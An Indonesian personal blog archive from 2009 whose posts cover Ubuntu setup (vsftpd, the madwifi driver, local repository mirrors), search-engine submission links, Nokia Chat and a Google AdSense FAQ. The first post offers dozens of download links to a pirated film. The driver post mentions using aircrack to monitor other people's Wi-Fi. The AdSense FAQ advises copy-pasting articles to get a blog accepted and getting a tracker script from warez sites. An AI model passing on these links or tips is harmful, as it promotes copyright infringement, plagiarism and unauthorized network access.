http://www.mystream.to/file-7194917-8ccba69f-2012.TA8626_www.movieinfo.blog.com_.avi
or
http://letitbit.net/download/0121.07e27533bc4770210e7d0df50/2012.TA8626_www.movieinfo.blog.com_.avi.html
or
http://d01.megashares.com/dl/6b116bc/2012.TA8626_www.movieinfo.blog.com_.avi
or
http://bitroad.net/download/27a72ecedd06d7fb464777ebfa6a0d4f9/2012.TA8626-www.movieinfo.blog.com-.avi.html
or
http://vip-file.com/download/8479.85f9e2ab5ddc931ca1ccd432cc/2012.TA8626_www.movieinfo.blog.com_.avi.html
or
http://sms4file.com/downloadvip/8479.85f9e2ab5ddc931ca1ccd432cc/2012.TA8626_www.movieinfo.blog.com_.avi.html
or
http://quickupload.net/1h1a2zg50639/2012.TA8626_www.movieinfo.blog.com_-quickupload.net.avi.html
or
http://www.2shared.com/file/9150461/9b9819ed/2012TA8626_wwwmovieinfoblogcom_.html
or
http://depositfiles.com/files/e15swczwc
or
http://www.zshare.net/video/68450747bff3a9b6/
or
http://uploadbox.com/files/bef0f1393c
or
http://netload.in/datei0rbdtLAcsR/2012.TA8626_www.movieinfo.blog.com_.avi.003.htm
http://netload.in/datei5RiT0UuC4Q/2012.TA8626_www.movieinfo.blog.com_.avi.002.htm
http://netload.in/dateiDchWjKffvP/2012.TA8626_www.movieinfo.blog.com_.avi.001.htm
http://netload.in/datei3Awo1RY8cF/2012.TA8626_www.movieinfo.blog.com_.avi.005.htm
http://netload.in/dateiSghG9fzyEY/2012.TA8626_www.movieinfo.blog.com_.avi.004.htm
or
http://hotfile.com/dl/17529656/eaae63d/2012.TA8626_www.movieinfo.blog.com_.avi.003.html
http://hotfile.com/dl/17529787/01b7cfd/2012.TA8626_www.movieinfo.blog.com_.avi.002.html
http://hotfile.com/dl/17530005/f7e5958/2012.TA8626_www.movieinfo.blog.com_.avi.001.html
http://hotfile.com/dl/17530108/27b15ef/2012.TA8626_www.movieinfo.blog.com_.avi.005.html
http://hotfile.com/dl/17530328/2461c94/2012.TA8626_www.movieinfo.blog.com_.avi.004.html
or
http://www.load.to//2012.TA8626_www.movieinfo.blog.com_.avi.003
http://www.load.to//2012.TA8626_www.movieinfo.blog.com_.avi.002
http://www.load.to//2012.TA8626_www.movieinfo.blog.com_.avi.001
http://www.load.to//2012.TA8626_www.movieinfo.blog.com_.avi.005
http://www.load.to//2012.TA8626_www.movieinfo.blog.com_.avi.004
or
http://www.BigAndFree.com/494104/2012.TA8626_www.movieinfo.blog.com_.avi.003.html
http://www.BigAndFree.com/494106/2012.TA8626_www.movieinfo.blog.com_.avi.002.html
http://www.BigAndFree.com/494107/2012.TA8626_www.movieinfo.blog.com_.avi.001.html
http://www.BigAndFree.com/494108/2012.TA8626_www.movieinfo.blog.com_.avi.005.html
http://www.BigAndFree.com/494109/2012.TA8626_www.movieinfo.blog.com_.avi.004.html
or
http://rapidshare.com/files/306847449/2012.TA8626_www.movieinfo.blog.com_.avi.005
http://rapidshare.com/files/306848299/2012.TA8626_www.movieinfo.blog.com_.avi.002
http://rapidshare.com/files/306848750/2012.TA8626_www.movieinfo.blog.com_.avi.004
http://rapidshare.com/files/306850315/2012.TA8626_www.movieinfo.blog.com_.avi.003
http://rapidshare.com/files/306850406/2012.TA8626_www.movieinfo.blog.com_.avi.001
or
http://www.mediafire.com/?0mkmwhw0q2z
http://www.mediafire.com/?mqh134tn0qy
http://www.mediafire.com/?wlqdmllxzml
http://www.mediafire.com/?5ol1tztffja
http://www.mediafire.com/?bzmwmzjijjm


silakan pilih sesuka kalian,....hehhehehe,..

Update : Saat ini, 22 November 2009. gue mendapat info bahwa semua link ini sudah ticak valid. gue ga tau kenapa tiba-tiba langsung dihapus. apakah ada hubungannya dengan berbagai protes keras dari berbagai penganut agama di seluruh dunia. :-) who knows..

Read More »

Minggu, 15 November 2009

Link Untuk Daftarkan Blog ke Search Engine

http://FreeWebSubmission.com
http://buildtraffic.com/free_search_...ubmission.html
http://www.addme.com/submission/free...sion-start.php
http://search.yahoo.com/info/submit.html
http://www.google.com/addurl/?continue=/addurl
http://search.msn.com/docs/submit.aspx
http://www.dmoz.org/add.html
http://www.exalead.com/search/C=0?de...itYourSitePage
http://www.scrubtheweb.com/addurl.html
http://www.cuil.com/info/contact_us/...?to=crawl%20me
http://www.whatuseek.com/addurl-secondary.shtml
http://www.exactseek.com/add.html
http://www.businessseek.biz/page.php...mission-policy
http://www.entireweb.com/free_submission/
http://www.searchme.com/support/submit.php
http://www.illumirate.com/add_your_site_exp.cfm
http://www.01webdirectory.com/submit.htm
http://addurl.amfibi.com/
http://searchsight.com/submit.htm
http://www.webbieworld.com/signup.asp
http://www.wlinker.com/add_submit_url
http://www.netinsert.com/en/insert.html
http://search.sonicrun.com/add
http://www.thalesdirectory.com/submit.php
http://www.linkcentre.com/addurl.html
http://re.search.wikia.com/
http://www.worldsiteindex.com/
http://www.mavicanet.com/



Untuk Search Engine Google di berbagai negara

http://www.google.co.kr/addurl
http://www.google.com/addurl
http://www.google.hu/addurl
http://www.google.de/addurl
http://www.google.jp/addurl
http://www.google.co.uk/addurl
http://www.google.com.au/addurl
http://www.google.ad/addurl
http://www.google.ae/addurl
http://www.google.com.af/addurl
http://www.google.com.ag/addurl
http://www.google.com.ai/addurl
http://www.google.am/addurl
http://www.google.it.ao/addurl
http://www.google.com.ar/addurl
http://www.google.as/addurl
http://www.google.at/addurl
http://www.google.az/addurl
http://www.google.com.bd/addurl
http://www.google.be/addurl
http://www.google.bg/addurl
http://www.google.com.bh
http://www.google.bi/addurl
http://www.google.com.bn/addurl
http://www.google.com.bo/addurl
http://www.google.com.br/addurl
http://www.google.bs/addurl
http://www.google.co.bw/addurl
http://www.google.com.by/addurl
http://www.google.com.bz/addurl
http://www.google.ca/addurl
http://www.google.cd/addurl
http://www.google.cg/addurl
http://www.google.ch/addurl
http://www.google.ci/addurl
http://www.google.co.ck/addurl
http://www.google.cl/addurl
http://www.google.cn/addurl
http://www.google.com.co/addurl
http://www.google.co.cr/addurl
http://www.google.com.cu/addurl
http://www.google.cz/addurl
http://www.google.de/addurl
http://www.google.dj/addurl
http://www.google.dk/addurl
http://www.google.dm/addurl
http://www.google.com.do/addurl
http://www.google.com.ec/addurl
http://www.google.ee/addurl
http://www.google.com.eg/addurl
http://www.google.es/addurl
http://www.google.com.et/addurl
http://www.google.fi/addurl
http://www.google.com.fj/addurl
http://www.google.fm/addurl
http://www.google.fr/addurl
http://www.google.ge/addurl
http://www.google.gg/addurl
http://www.google.com.gh/addurl
http://www.google.com.gi/addurl
http://www.google.gl/addurl
http://www.google.gm/addurl
http://www.google.gp/addurl
http://www.google.gr/addurl
http://www.google.com.gt/addurl
http://www.google.gy/addurl
http://www.google.com.hk/addurl
http://www.google.hn/addurl
http://www.google.hr/addurl
http://www.google.ht/addurl
http://www.google.hu/addurl
http://www.google.co.id/addurl
http://www.google.ie/addurl
http://www.google.co.il/addurl
http://www.google.im/addurl
http://www.google.co.in/addurl
http://www.google.is/addurl
http://www.google.it/addurl
http://www.google.je/addurl
http://www.google.com.jm/addurl
http://www.google.jo/addurl
http://www.google.co.jp/addurl
http://www.google.co.ke/addurl
http://www.google.com.kh/addurl
http://www.google.ki/addurl
http://www.google.kg/addurl
http://www.google.co.kr/addurl
http://www.google.kz/addurl
http://www.google.la/addurl
http://www.google.li/addurl
http://www.google.lk/addurl
http://www.google.co.ls/addurl
http://www.google.lt/addurl
http://www.google.lu/addurl
http://www.google.lv/addurl
http://www.google.com.ly/addurl
http://www.google.co.ma/addurl
http://www.google.md/addurl
http://www.google.mn/addurl
http://www.google.ms/addurl
http://www.google.com.mt/addurl
http://www.google.mu/addurl
http://www.google.mv/addurl
http://www.google.mw/addurl
http://www.google.com.mx/addurl
http://www.google.com.my/addurl
http://www.google.com.na/addurl
http://www.google.com.nf/addurl
http://www.google.com.ng/addurl
http://www.google.com.ni/addurl
http://www.google.nl/addurl
http://www.google.no/addurl
http://www.google.com.np/addurl
http://www.google.nr/addurl
http://www.google.nu/addurl
http://www.google.com.om/addurl
http://www.google.com.pa/addurl
http://www.google.com.pe/addurl
http://www.google.com.ph/addurl
http://www.google.com.pk/addurl
http://www.google.pl/addurl
http://www.google.pn/addurl
http://www.google.com.pr/addurl
http://www.google.pt/addurl
http://www.google.com.py/addurl
http://www.google.com.qa/addurl
http://www.google.ro/addurl
http://www.google.ru/addurl
http://www.google.rw/addurl
http://www.google.com.sa/addurl
http://www.google.com.sb/addurl
http://www.google.sc/addurl
http://www.google.se/addurl
http://www.google.com.sg/addurl
http://www.google.sh/addurl
http://www.google.si/addurl
http://www.google.sk/addurl
http://www.google.sn/addurl
http://www.google.sm/addurl
http://www.google.st/addurl
http://www.google.com.sv/addurl
http://www.google.co.th/addurl
http://www.google.com.tj/addurl
http://www.google.tk/addurl
http://www.google.tl/addurl
http://www.google.tm/addurl
http://www.google.to/addurl
http://www.google.com.tr/addurl
http://www.google.tt/addurl
http://www.google.com.tw/addurl
http://www.google.com.ua/addurl
http://www.google.co.ug/addurl
http://www.google.co.uk/addurl
http://www.google.com.uy/addurl
http://www.google.co.uz/addurl
http://www.google.com.vc/addurl
http://www.google.co.ve/addurl
http://www.google.vg/addurl
http://www.google.co.vi/addurl
http://www.google.com.vn/addurl
http://www.google.vu/addurl
http://www.google.ws/addurl
http://www.google.rs/addurl
http://www.google.co.za/addurl
http://www.google.co.zm/addurl
http://www.google.co.zw/addurl


Read More »

Jumat, 30 Oktober 2009

Instal VSFTPD di Ubuntu 8.04

Vsftpd adalah salah satu pilihan aplikasi untuk menjalankan FTP server. Vsftpd memberikan kombinasi yang serasi antara performa dan keamanan. Tutorial ini akan menjelaskan bagaimana cara menginstal vsftpd di Ubuntu Hardy.


1. Install paket VSFTPD. ketikkan command berikut ini di terminal
root@pirates:~# apt-get install vsftpd

Output :

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
libarts1c2a kdelibs4c2a libartsc0 kdelibs-data liblualib50 libmcrypt4
libavahi-qt3-1 libqt3-mt liblua50 libaudio2
Use 'apt-get autoremove' to remove them.
The following NEW packages will be installed:
vsftpd
0 upgraded, 1 newly installed, 0 to remove and 127 not upgraded.
Need to get 97.0kB of archives.
After this operation, 401kB of additional disk space will be used.
Get:1 http://ubuntu.indika.net.id hardy-updates/main vsftpd 2.0.6-1ubuntu1.1 [97.0kB]
Fetched 97.0kB in 0s (606kB/s)
Selecting previously deselected package vsftpd.
(Reading database ... 105193 files and directories currently installed.)
Unpacking vsftpd (from .../vsftpd_2.0.6-1ubuntu1.1_i386.deb) ...
Setting up vsftpd (2.0.6-1ubuntu1.1) ...
Adding system user `ftp' (UID 113) ...
Adding new user `ftp' (UID 113) with group `nogroup' ...
Not creating home directory `/home/ftp'.
* Starting FTP server: vsftpd [ OK ]

root@pirates:~#


2. Atur kembali pengaturan FTP di /ect/vsftpd.conf. ketikkan command ini di terminal (gue menggunakan nano editor)
root@pirates:/etc# nano vsftpd.conf

3. Ubahlah nilai-nilai dibawah ini (yang di cetak tebal).
# Uncomment this to allow local users to log in.
local_enable=YES
# Uncomment this to enable any form of FTP write command.
write_enable=YES
# You may restrict local users to their home directories. See the FAQ for
# the possible risks in this before using chroot_local_user or
# chroot_list_enable below.
chroot_local_user=YES

save file dan kemudian tutup.

4. Restart service VSFTPD
root@pirates:/etc# /etc/init.d/vsftpd restart


sumber : disini



Read More »

Minggu, 25 Oktober 2009

Instal Atheros wireless driver di laptop axioo

Baru Install lagi Ubuntu di Lappie Axioo gue. Karena sepertinya ada yang aneh dengan Ndiswrapper gue. kadang Wifinya konek, kadang kaga. dah gitu, sepertinya Ndiswrapper membuat Wireless gue ga bisa monitor wifi2 gretongan (baca : aircrack). soalnya setiap di hidupkan mode monitornya, selalu keluar informasi bahwa perangkat tidak support. Selain itu, Ubuntu yang tertanam di Laptop gue dah mulai berat dan sakit2an. maklum, sering di buat bahan percobaan. :-)

Oke, dah cukup panjang lebar basa basinya. Sekarang waktunya instal ulang. Langkah pertama tentu saja mematikan service Acpi. karena chipset gue ga support untuk linux (sepertinya ya... maklum, masih nubie. jadi suka buat kesimpulannya asal2 aja..) cara instal selanjutnya bisa dilihat disini.



Setelah terinstal dengan manis Ubuntu 8.04 di Axioo gue, mulailah gue coba instal Wireless driver untuk atheros gue. Kali ini gue mo coba pake Madwifi.

1. Cek device kita, untuk spesifikasinya. caranya, masuk ke terminal. kemudian ketik lspci.


disana terlihat bahwa device Wifi gue adalah "Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter"

2. Matikan driver atheros yang defaultnya telah terinstal. caranya adalah buka tab System > Administration > Hardware Drivers. Kemudian nonaktifkan Atheros HAL dan Support for atheros 8.02. Kemudian restart Laptopnya.

3. Instal build essential and subversion. cukup dengan ketikkan command ini diterminal
"sudo apt-get install build-essential subversion"

4. Buat direktori di home.
root@pirates:/home/tedjo# cd ~
root@pirates:~# mkdir madwifi


5. Masuk ke direktory yang telah dibuat tadi
root@pirates:~# cd madwifi


6. Download driver madwifi, ketikkan perintah ini di terminal
root@pirates:~/madwifi# svn co https://svn.madwifi-project.org/madwifi/branches/madwifi-hal-0.10.5.6


7. Setelah selesai mendownload driver. lanjutkan masuk ke dalam direktory madwifi-hal-0.10.5.6
root@pirates:~/madwifi# cd madwifi-hal-0.10.5.6


8. Jalankan perintah "make" untuk mengcompile driver
root@pirates:~/madwifi/madwifi-hal-0.10.5.6# make


9. Instal Driver
root@pirates:~/madwifi/madwifi-hal-0.10.5.6# make install


10. Kemudian tambahkan Atheros modules agar driver dapat otomatis di load setiap kali laptop dinyalakan. Cukup tambahkan "ath_pci" (tanpa kutip) di baris akhir /etc/modules. dalam hal ini, gue menggunakan text editor nano untuk mengedit modules tersebut.
root@pirates:~/madwifi/madwifi-hal-0.10.5.6#nano /etc/modules


Setelah ini, reboot laptop. seharusnya saat ini driver tersebut sudah berjalan dengan baik di laptop Axioo gue.

Berikut spesifikasi laptop yang gue pake.
root@pirates:~/madwifi# lspci
00:00.0 Host bridge: Silicon Integrated Systems [SiS] 671MX
00:01.0 PCI bridge: Silicon Integrated Systems [SiS] SiS AGP Port (virtual PCI-to-PCI bridge)
00:02.0 ISA bridge: Silicon Integrated Systems [SiS] SiS968 [MuTIOL Media IO] (rev 01)
00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev 01)
00:03.0 USB Controller: Silicon Integrated Systems [SiS] USB 1.1 Controller (rev 0f)
00:03.1 USB Controller: Silicon Integrated Systems [SiS] USB 1.1 Controller (rev 0f)
00:03.3 USB Controller: Silicon Integrated Systems [SiS] USB 2.0 Controller
00:04.0 Ethernet controller: Silicon Integrated Systems [SiS] 191 Gigabit Ethernet Adapter (rev 02)
00:05.0 IDE interface: Silicon Integrated Systems [SiS] SATA Controller / IDE mode (rev 03)
00:06.0 PCI bridge: Silicon Integrated Systems [SiS] PCI-to-PCI bridge
00:07.0 PCI bridge: Silicon Integrated Systems [SiS] PCI-to-PCI bridge
00:0b.0 FireWire (IEEE 1394): Ricoh Co Ltd R5C832 IEEE 1394 Controller (rev 05)
00:0b.1 SD Host controller: Ricoh Co Ltd R5C822 SD/SDIO/MMC/MS/MSPro Host Adapter (rev 22)
00:0b.2 System peripheral: Ricoh Co Ltd R5C843 MMC Host Controller (rev 12)
00:0b.3 System peripheral: Ricoh Co Ltd R5C592 Memory Stick Bus Host Adapter (rev ff)
00:0f.0 Audio device: Silicon Integrated Systems [SiS] Azalia Audio Controller
01:00.0 VGA compatible controller: Silicon Integrated Systems [SiS] 771/671 PCIE VGA Display Adapter (rev 10)
02:00.0 Ethernet controller: Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter (rev 01)
root@pirates:~/madwifi#


sumber : disini
Read More »

Jumat, 23 Oktober 2009

Daftar server Repository IIX untuk Ubuntu 8.04





Cari-cari daftar repo untuk Hardy Heron dengan server Indonesia, alhamdulillah nemu.

Sebelum memilih server mana yang hendak di pilih (bahasanya memusingkan...), gue melakukan Ping serta traceroute ke server yang ada, karena sempat kemarin milih server kambing (dari UI tuch) ech..., ternyata enggak bisa di akses, jadi cari yang laen dech, dan ini hasilnya.

Ech.., masih ada di bawah sana tuch hasilnya.....

Ping dan traceroute telah tersedia pada System -->> Administration -->> Network Tools. Masukkan saja alamatnya, semisal, pingin trace route server dari UGM, masukkan saja repo.ugm.ac.id pada kolom yang tersedia. So simple. Demikian juga dengan ping. PING juga bisa dilakukan dari terminal, dengan mengetikkan ping repo.ugm.ac.id atau ping alamat mana yangdikehendaki.

Berikut daftar buruan kita...

repo.ugm.ac.id

deb http://repo.ugm.ac.id/ubuntu/ hardy main multiverse restricted universe
deb http://repo.ugm.ac.id/ubuntu/ hardy-updates main multiverse restricted universe
deb http://repo.ugm.ac.id/ubuntu/ hardy-security main multiverse restricted universe

mirror.its.ac.id (ITS, INHERENT)
deb http://mirror.its.ac.id/ubuntu hardy main multiverse restricted universe
deb http://mirror.its.ac.id/ubuntu hardy-security main multiverse restricted universe
deb http://mirror.its.ac.id/ubuntu hardy-backports main multiverse restricted universe
deb http://mirror.its.ac.id/ubuntu hardy-updates main multiverse restricted universe

kambing.ui.edu (UI, Telkom, Indosat, OpenIXP, INHERENT)

deb http://kambing.ui.edu/ubuntu hardy main restricted universe multiverse
deb http://kambing.ui.edu/ubuntu hardy-updates main restricted universe multiverse
deb http://kambing.ui.edu/ubuntu hardy-security main restricted universe multiverse
deb http://kambing.ui.edu/ubuntu hardy-backports main restricted universe multiverse
deb http://kambing.ui.edu/ubuntu hardy-proposed main restricted universe multiverse

mirror.cbn.net.id (OpenIXP)
deb http://ubuntu.cbn.net.id/Ubuntu hardy main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu hardy-updates main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu hardy-security main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu hardy-backports main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu hardy-proposed main restricted universe multiverse

komo.vlsm.org

deb http://komo.vlsm.org/ubuntu hardy main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-updates main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-security main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-backports main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-proposed main restricted universe multiverse

indika.net.id (OpenIXP)

deb http://ubuntu.indika.net.id/ hardy main restricted universe multiverse
deb http://ubuntu.indika.net.id/ hardy-updates main restricted universe multiverse
deb http://ubuntu.indika.net.id/ hardy-security main restricted universe multiverse
deb http://ubuntu.indika.net.id/ hardy-backports main restricted universe multiverse
deb http://ubuntu.indika.net.id/ hardy-proposed main restricted universe multiverse

ftp.itb.ac.id (ITB, INHERENT)

deb ftp://ftp.itb.ac.id/pub/ubuntu hardy main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy-updates main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy-security main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy-backports main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu hardy-proposed main restricted universe multiverse

foss-id.web.id (Telkom)

deb http://dl2.foss-id.web.id/ubuntu hardy main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu hardy-updates main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu hardy-security main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu hardy-backports main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu hardy-proposed main restricted universe multiverse

Untuk mengubah daftar repositori, ada 2 cara, yaitu melalui “Synaptic Package Manager” dan melalui terminal:

Melalui Synaptic Package Manager:

1. Buka menu: System | Administration | Synaptic Package Manager
2. Pilih menu: Settings | Repositories
3. Pilih tab “Third-Party Software”
4. Pilih “Add”
5. Masukkan baris pertama pada salah satu server repositori pada daftar di atas. Misalnya:

deb http://kambing.ui.edu/ubuntu gutsy main restricted universe multiverse

6. Klik “Add” lagi, lalu isikan baris berikutnya. Lakukan langkah ini hingga semua baris pada server tersebut selesai anda masukkan.
7. Setelah selesai, centang setiap item pada daftar “Third-Party Software”
8. Klik “Close”
9. Klik “Reload” pada ikon di sebelah kiri atas

Melalui terminal:

1. Masukkan perintah berikut:

sudo gedit /etc/apt/sources.list

2. Hapus seluruh baris pada file ini (jeh...) dan ganti dengan baris-baris pada salah satu server dari daftar di atas. Contoh:

deb http://komo.vlsm.org/ubuntu hardy main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-updates main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-security main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-backports main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu hardy-proposed main restricted universe multiverse

3. Melalui terminal, masukkan perintah berikut:

sudo apt-get update

Setelah dicoba, apakah lebih cepet update reponya?? ternyata memang internetnya saja yang lambat..., tidak terlalu jauh beda dengan yang di archive.ubuntu.com (main)...

Sumber : disini
Read More »

Kamis, 22 Oktober 2009

Nokia Messenger ( Saingannya BlackBerry Messenger)





Bagi pengguna Hp Nokia yang ingin chat sesama pengguna Nokia bisa pake software ini.. and gratiss downloadnnya.. kena pulsa internet aja...nih pripiuw nya..artiin sendiri....


Nokia Chat has graduated as Contacts on Ovi

Thank you for using Nokia Chat. Now there is a new version available branded as Contacts on Ovi. Even though your current Nokia Chat client still works we recommend you to download the latest Contacts on Ovi files. Your account that was created with Nokia Chat will be used with Contacts on Ovi and all your friends stay unchanged as well.
Overview

Nokia Chat is more than just messaging. You can share your status and your location, giving you physical presence! Start a Nokia Chat with your friends with instant and voice messaging and finish it face-to-face. Get together with Nokia Chat.

What is Nokia Chat?
In Nokia Chat, you can chat with your friends, send voice messages to your chat partners, and indicate your availability to your friends. You can also show information about your location to your contacts.

What is the difference between Nokia Chat and other instant messaging clients that I’ve used?
Instant messaging (chat) is familiar from the PC world. Now you can have the same experience with your Nokia mobile device.

What do I need to get started?
To use Nokia Chat, you must have the following:

* A Nokia account, username, and password
* Mobile:
* A wireless data service plan with your wireless operator
* A compatible Nokia mobile device
* The Nokia Chat application on your Nokia mobile device, check which models are compatible

cuma Hp nokia yg di support

Select the version:

* Ovi Contacts for S60 5th Edition
* Ovi Contacts for S60 3rd Edition Feature Pack 2
* Ovi Contacts for S60 3rd Edition Feature Pack 1
* Ovi Contacts for S60 3rd Edition (initial release)
* Ovi Contacts for Series 40
* Ovi Contacts for Maemo

link bwat download :
http://betalabs.nokia.com/betas/view/nokia-chat
http://betalabs.nokia.com/betas/view/contacts-ovi
Read More »

Jumat, 16 Oktober 2009

FAQ Seputar Google Adsense

Artikel berikut ini dirangkum dari pertanyaan2 (dan jawaban) yg diajukan di bagian Konsultasi AdSense. Salah satu alasan kenapa saya memutuskan untuk merangkumnya di sini adalah karena halaman konsultasi tersebut sudah sedemikian panjangnya (kaget juga sih liat respon dari temen2 ), sehingga sangat sulit untuk membaca dan menelusuri masing2 topik yg dibahas.


Mengenai Dasar AdSense
Q: Apa itu CTR, CPC, eCPM, dll?
A: Baca penjelasannya di sini.

Q: Bagaimana agar situs kita diterima oleh Google?
A: Cara berikut biasanya berhasil:

Bikin blog baru di blogspot
Gunakan salah satu template selain yg default (biar gak keliatan bikinnya asal2an) atau bisa juga pake custom template yg banyak ada di internet.
Ambil artikel2 dari situs free publish article, seperti ArticleCity, GoArticle, dll. Copy-paste sekitar 10 artikel dari sana.
Coba apply lagi dng menggunakan blog tersebut.
Q: Bagaimana cara mengganti email yg kita gunakan untuk mendaftar di Google AdSense?
A: Tidak bisa, tapi bisa dicoba untuk langsung mengkontak Google dan menjelaskan alasan melakukan perubahan, siapa tahu diperbolehkan.

Mengenai Implementasi AdSense
Q: Apakah boleh meletakkan kode AdSense dalam IFRAME?
A: Boleh, tapi tidak disarankan. Dulu halaman Setup milik Google mengikutsertakan pilihan untuk membuat kode AdSense yg bisa diletakkan di tag IFRAME, tapi fitur ini sekarang sudah dihilangkan. Walaupun begitu, Program Policies Google AdSense tidak menyebutkan apakah kita diperbolehkan menggunakan IFRAME atau tidak. Jadi, untuk berjaga2, jika memang memungkinkan, hindari meletakkan kode AdSense dalam IFRAME.

Q: Apakah boleh meletakkan kode AdSense di lebih dari satu situs?
A: Boleh saja. Dan Anda tidak perlu mendaftarkan masing2 situs tersebut.

Q: Bagaimana cara memasang video ad units AdSense?
A: Baca penjelasannya di sini.

Q: Apakah boleh menyamarkan ad units AdSense sehingga tidak kelihatan seperti iklan?
A: Boleh, asal masih ada dalam batasan2 yg diberikan oleh Google di Program Policies mereka.

Q: Apakah pengunjung tetap situs kita lebih cenderung mengabaikan iklan AdSense dibandingkan pengunjung baru? Cara mengatasinya?
A: Ya. Efek ini disebut dengan “Ad Blindness”, yaitu kecenderungan pengunjung untuk mengabaikan iklan yg ada karena mereka sudah terlalu sering melihatnya. Untuk mengatasinya, letakkan ad units AdSense secara acak atau ubahlah desain situs Anda secara berkala, antara 3 sampai 6 bulan sekali.

Q: Mengapa CPC saya kecil atau tidak stabil?
A: CPC dipengaruhi oleh bid yg dipasang oleh pemasang iklan di AdWords. Pemasang iklan tentunya tidak sembarangan dalam memasang bid karena itu mempengaruhi dana yg mereka keluarkan. Bisa jadi mereka memasang bid yg besar di waktu2 tertentu, dan sebaliknya, merendahkan pengeluaran mereka di hari2 lainnya.

Q: Saya lihat ada situs lain yg memodifikasi kode AdSense mereka. Apakah diperbolehkan?
A: Tidak. Kecuali mereka adalah publisher2 premium AdSense yg memang berhak dan diperbolehkan untuk melakukan hal tersebut.

Mengenai Referral AdSense
Q: Apakah kita akan mendapatkan uang apabila ada yg mengklik link referral AdSense kita?
A: Tidak. Kita hanya akan mendapatkan uang apabila ada yg mendaftar AdSense melalui link tersebut dan mendapatkan $100 dalam waktu kurang dari 6 bulan (180 hari). Untuk keterangan lebih lanjut mengenai referral, baca di sini.

Mengenai Software Monitor AdSense

Q: Apakah AdSense Tracker itu?
A: AdSense Tracker adalah script 3rd-party yg berguna untuk mendeteksi dan memonitor segala kegiatan yg berhubungan dengan ad units AdSense kita, baik jumlah klik, asal pengunjung yg meng-klik, dsb.

Q: Dimana bisa mendapatkan script AdSense Tracker?
A: Anda bisa membelinya di AdSenseTracker.com atau silahkan berburu di situs2 warez

Q: Apakah boleh memasang lebih dari satu script tracking AdSense?
A: Boleh.

Mengenai Banned
Q: Apakah tanda2 di-banned?
A: Yg pertama, kita akan mendapatkan imel dari Google mengenai hal tersebut. Yg kedua, Anda tidak bisa lagi login ke Member Area AdSense. Yg terakhir, seluruh ad units yg Anda pasang akan menampilkan PSA.

Q: Apa yg harus kita lakukan apabila terlanjur di-banned? Apakah bisa ikut AdSense lagi?
A: Baca jawabannya di sini.

Mengenai PIN

Q: Apa itu PIN?
A: PIN adalah nomer identifikasi yg diberikan oleh Google sebagai sarana pengecekan apakah alamat yg kita gunakan untuk mendaftarkan diri di Google AdSense valid atau tidak. Agar dapat melakukan payout, Anda harus memasukkan nomer PIN yg Anda terima di Member Area AdSense. Hanya publisher AdSense yg mendaftar setelah sekitar pertengahan 2005 saja yg akan menerima PIN.

Q: Kapan PIN dikirim?
A: PIN akan dikirimkan pada saat pendapatan kita mencapai $50 tanpa ada pemberitahuan terlebih dahulu. Statusnya dapat Anda lihat di Member Area AdSense.

Q: Kenapa saya belum menerima nomer PIN?
A: Google menggunakan surat pos biasa untuk mengirimkan nomer PIN, jadi jangka waktu pengirimannya berbeda2 dan untuk yg tinggal di daerah terpencil, memang ada kemungkinan untuk tidak menerima kiriman tersebut (tergantung pihak kantor pos di daerah tersebut). Jika dalam waktu sekitar 1.5 bulan Anda belum menerima PIN Anda, kontak Google.

Lain-Lain

Q: Apakah click-club / click-exchange dilarang? Apakah dapat meningkatkan pendapatan kita?
A: Ya. Ini tercantum dalam Program Policies Google AdSense. Mengikuti / menjalankan kegiatan ini memang mungkin dapat meningkatkan pendapatan AdSense kita dengan cepat, tapi apa artinya kalo tiba2 Anda di-banned dari Google.


Sumber : disini dan disini
Read More »

Kosakata Google Adsense dan aturan penggunaannya

Beberapa definisi dari Google Adsense

* Publisher adalah orang atau pemilik situs yang sudah bergabung dan memasang iklan AdSense di situs mereka.

* Ad Units adalah iklan AdSense itu sendiri. Ad Units terdiri dari beberapa jenis dan ukuran. Yang paling umum adalah jenis iklan teks. Pada saat pengunjung mengklik unit iklan ini, maka (jika sah) pemasang iklan akan mendapatkan pemasukan sesuai dengan nilai CPC-nya.


* CTR (Clickthrough Rate) adalah perbandingan dalam persen antara jumlah klik yang diterima suatu Ad Units dengan jumlah tampilan Ad Units tersebut. Misal, satu Ad Units yang ditampilkan 40 kali dan di-klik 10 kali memiliki nilai CTR 25% (10:40).

* Page Impressions adalah jumlah yang menunjukkan berapa kali halaman yang mengandung Ad Units dibuka oleh pengunjung. Nilainya tidak terpengaruh oleh kuantitas Ad Units yang ada di dalam halaman yang bersangkutan.

* CPC (Cost Per Click) adalah jumlah uang yang akan didapatkan oleh publisher apabila Ad Units tertentu di klik. Nilai CPC masing-masing Ad Units berbeda dan ditentukan oleh banyak faktor, termasuk perfomance publisher dan kualitas situs milik publisher. Namun secara umum, nilai maksimal yang mungkin adalah 20% dari nilai bid dinamis yang ditawarkan pemasang iklan.
* eCPM (Effective CPM) adalah adalah hasil pembagian antara jumlah pendapatan publisher dengan jumlah page impression (per 1000) yang ia dapatkan dari iklan2nya. Sebagai contoh, publisher yang menghasilkan $200 dari 50,000 impression akan memiliki nilai CPM sebesar $4 ($200/50).

